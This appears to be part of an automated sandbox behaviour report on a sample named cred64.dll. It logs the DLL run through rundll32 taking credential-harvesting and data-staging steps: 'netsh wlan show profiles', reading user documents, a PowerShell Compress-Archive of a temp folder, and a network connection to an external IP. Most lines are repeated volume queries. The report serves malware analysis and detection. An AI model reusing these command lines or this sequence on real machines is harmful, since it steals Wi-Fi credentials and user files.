    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 212.193.31.8 80Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1Jump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\WUTJSCBCFX.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\WUTJSCBCFX.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
